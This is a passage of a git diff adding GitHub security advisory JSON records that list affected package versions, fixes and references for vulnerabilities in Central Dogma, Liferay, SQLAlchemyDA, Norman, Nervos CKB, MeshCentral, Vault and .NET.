vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.linecorp.centraldogma:centraldogma-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.64.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1143" + }, + { + "type": "WEB", + "url": "https://github.com/line/centraldogma/commit/8edcf913b88101aff70008156b0881850e005783" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T16:55:20Z", + "nvd_published_at": "2024-02-02T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json b/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json new file mode 100644 index 0000000000000..c3f061f506535 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json @@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwj8-qgpr-8crm", + "modified": "2024-02-08T18:31:19Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-25148" + ], + "summary": "Liferay Portal vulnerable to user impersonation", + "details": "In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25148" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:31:19Z", + "nvd_published_at": "2024-02-08T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json b/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json new file mode 100644 index 0000000000000..5159fb2410fe9 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3jc-3qmm-w3pw", + "modified": "2024-02-07T17:28:26Z", + "published": "2024-02-07T17:28:26Z", + "aliases": [ + "CVE-2024-24811" + ], + "summary": "SQLAlchemyDA unauthenticated arbitrary SQL query execution", + "details": "### Impact\nThe vulnerability allows unauthenticated execution of arbitrary SQL statements on the database the SQLAlchemyDA instance is connected to. All users are affected.\n\n### Patches\nThe problem has been patched in version 2.2.\n\n### Workarounds\nThere is no workaround. All users are urged to upgrade to version 2.2\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Products.SQLAlchemyDA" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24811" + }, + { + "type": "WEB", + "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:28:26Z", + "nvd_published_at": "2024-02-07T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json b/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json new file mode 100644 index 0000000000000..eeca3d4997ff8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8f4-hv23-6qp6", + "modified": "2024-02-08T18:45:49Z", + "published": "2024-02-08T18:45:49Z", + "aliases": [ + "CVE-2023-32193" + ], + "summary": "Norman API Cross-site Scripting Vulnerability", + "details": "### Impact\nA vulnerability has been identified in which unauthenticated cross-site scripting (XSS) in Norman's public API endpoint can be exploited. This can lead to an attacker exploiting the vulnerability to trigger JavaScript code and execute commands remotely. \n\nThe attack vector was identified as a Reflected XSS.\n\nNorman API propagates malicious payloads from user input to the UI, which renders the output. For example, a malicious URL gets rendered into a script that is executed on a page.\n\nThe changes addressed by this fix are:\n- Encode input that comes from the request URL before adding it to the response.\n- The request input is escaped by changing the URL construction that is used for links to use `url.URL`.\n- The request input is escaped by escaping the JavaScript and CSS variables with attribute encoding as defined by [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary).\n\n### Patches\nPatched versions include the following commits:\n\n| Branch | Commit |\n| -------- | ------- |\n| master | 3bb70b7 |\n| release/v2.8 | a6a6cf5 |\n| release/v2.7 | cb54924 |\n| release/v2.7.s3 | 7b2b467 |\n| release/v2.6 | bd13c65 |\n\n### Workarounds\nThere is no direct mitigation besides updating Norman API to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/norman" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240207153100-3bb70b772b52" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rancher/norman/security/advisories/GHSA-r8f4-hv23-6qp6" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/norman/commit/3bb70b772b52297feac64f5fdeb1b13c06c37e39" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/norman/commit/7b2b467995e6dfab6d4a5dee8dffc15033ae8269" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/norman/commit/a6a6cf5696088c32002953d36b75bdcc84f2399e" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/norman/commit/bd13c653293b9b5e0b37e8a6ccd1c3277f4623ed" + }, + { + "type": "WEB", + "url": "https://github.com/rancher/norman/commit/cb54924f25c7666511a913cd41834299ef22dba4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/norman" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:45:49Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json b/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json new file mode 100644 index 0000000000000..4b52ce3144fcc --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9rv-9mh8-pxf4", + "modified": "2024-02-02T22:23:07Z", + "published": "2024-02-02T22:23:07Z", + "aliases": [ + + ], + "summary": "Nervos CKB BlockTimeTooNew should not be considered as invalid block", + "details": "### Impact\n\nCurrently, when a node receives a block in future according to its local wall clock, it will mark the block as invalid and ban the peer. \n\nIf the header's timestamp is more than 15 seconds ahead of our current time. In that case, the header may become valid in the future, and we don't want to disconnect a peer merely for serving us one too-far-ahead block header, to prevent an attacker from splitting the network by mining a block right at the 15 seconds boundary.\n\n### Patches\n\nUpgrade to v0.33.1 or above.\n\n### Workarounds\nDon't ban peer serving too-far-ahead block header.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.33.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.33.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-r9rv-9mh8-pxf4" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/760d447c8b600df0539debe80b1625836fc72819" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:23:07Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json b/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json new file mode 100644 index 0000000000000..cdee3c48df5af --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v269-rrr6-cx6r", + "modified": "2024-02-02T20:16:20Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-51838" + ], + "summary": "Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.", + "details": "Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "meshcentral" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.16" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51838" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Ylianst/MeshCentral" + }, + { + "type": "WEB", + "url": "https://github.com/Ylianst/MeshCentral/tree/master" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51838.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:16:20Z", + "nvd_published_at": "2024-02-02T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json b/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json new file mode 100644 index 0000000000000..bc95b80ac4c72 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgh3-mwxq-rcp8", + "modified": "2024-02-01T20:52:34Z", + "published": "2024-02-01T03:30:22Z", + "aliases": [ + "CVE-2024-0831" + ], + "summary": "Hashicorp Vault may expose sensitive log information", + "details": "Vault and Vault Enterprise (“Vault”) may expose sensitive information when enabling an audit device which specifies the `log_raw` option, which may log sensitive information to other audit devices, regardless of whether they are configured to use `log_raw`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.15.0" + }, + { + "fixed": "1.15.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0831" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/2a72f2a8a5b57de88c22a2a94c4a5f08c6f3770b" + }, + { + "type": "WEB", + "url": "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/vault" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:52:34Z", + "nvd_published_at": "2024-02-01T02:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json b/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json new file mode 100644 index 0000000000000..68fab16104b9e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json @@ -0,0 +1,581 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh55-786g-wjwj", + "modified": "2024-02-03T00:47:54Z", + "published": "2024-02-03T00:47:54Z", + "aliases": [ + + ], + "summary": ".NET Information Disclosure Vulnerability", + "details": "Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core 3.1 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn information disclosure vulnerability exists in .NET Core 3.1 and .NET 6.0 that could lead to unauthorized access of privileged information.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.7 or earlier.\n* Any .NET Core 3.1 applicaiton running on .NET Core 3.1.27 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET Core 3.1\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Xml](http://system.security)| <=4.7.0| 4.7.1\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm)| >=3.1.0, 3.1.27| 3.1.28\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Xml](https://www.nuget.org/packages/System.Security.Cryptography.Xml)| >=5.0.0, 6.0.0| 6.0.1\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm)| >=6.0.0, 6.0.7| 6.0.8\n\n## Patches\n\n\n* If you're using .NET 6.0, you should download and install Runtime 6.0.8 or SDK 6.0.108 (for Visual Studio 2022 v17.1) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n* If you're using .NET Core 3.1, you should download and install Runtime 3.1.28 (for Visual Studio 2019 v16.9) from https://dotnet.microsoft.com/download/dotnet-core/3.1.\n\n\n### Other\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/232\nAn Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/43166\nMSRC details for this can be found at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34716", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "System.Security.Cryptography.Xml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.7.0" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "System.Security.Cryptography.Xml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "6.0.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.0" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.osx-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-musl-arm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/dotnet/aspnetcore/security/advisories/GHSA-vh55-786g-wjwj" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + 